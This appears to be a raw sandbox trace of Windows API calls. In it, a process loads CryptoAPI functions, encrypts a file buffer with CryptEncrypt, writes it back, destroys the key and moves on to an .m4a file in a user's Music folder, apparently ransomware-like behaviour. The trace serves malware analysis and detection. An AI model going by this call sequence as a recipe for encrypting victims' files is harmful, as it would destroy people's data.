1 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0116.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0378 | out: hHeap=0x1780000) returned 1 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0116.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0116.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d04e0 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0116.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d04e0 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0116.672] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0116.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0116.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0116.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796f08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0116.673] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03f0 | out: hHeap=0x1780000) returned 1 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03c8 | out: hHeap=0x1780000) returned 1 [0116.673] CryptGetKeyParam (in: hKey=0x41ac780, dwParam=0x7, pbData=0x43e29f0, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e29f0*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0116.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0530 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0116.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0116.675] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0116.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0116.676] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0116.676] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0580 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0116.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0116.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0116.677] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0116.677] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.677] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0116.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0116.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0116.678] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0xbb73, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0xbb80) returned 1 [0116.678] CharLowerBuffW (in: lpsz="byte[48001]", cchLength=0xb | out: lpsz="byte[48001]") returned 0xb [0116.680] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.680] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0116.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb240, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0116.680] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4539290*, pdwDataLen=0x144e088*=0xbb73, dwBufLen=0xbb80 | out: pbData=0x4539290*, pdwDataLen=0x144e088*=0xbb80) returned 1 [0116.680] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0116.680] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0116.680] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.722] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xbb80, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ea8c*=0xbb80, lpOverlapped=0x0) returned 1 [0116.724] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0116.724] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0116.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cad48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0116.724] CryptDestroyKey (hKey=0x41ac780) returned 1 [0116.724] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0116.724] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0116.725] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.725] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0116.725] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0116.725] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.725] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.725] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0116.725] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0116.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0116.725] CryptReleaseContext (hProv=0x41a50b8, dwFlags=0x0) returned 1 [0116.725] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.725] FreeLibrary (hLibModule=0x756e0000) returned 1 [0116.725] CloseHandle (hObject=0x258) returned 1 [0116.725] CloseHandle (hObject=0x298) returned 1 [0116.727] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\kEfh1XIhHEyxIZI.m4a", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\kEfh1XIhHEyxIZI.m4a", lpFilePart=0x0) returned 0x50 [0116.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42da298 [0116.727] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\kEfh1XIhHEyxIZI.m4a" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t\\kefh1xihheyxizi.m4a")) returned 0x20 [0116.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 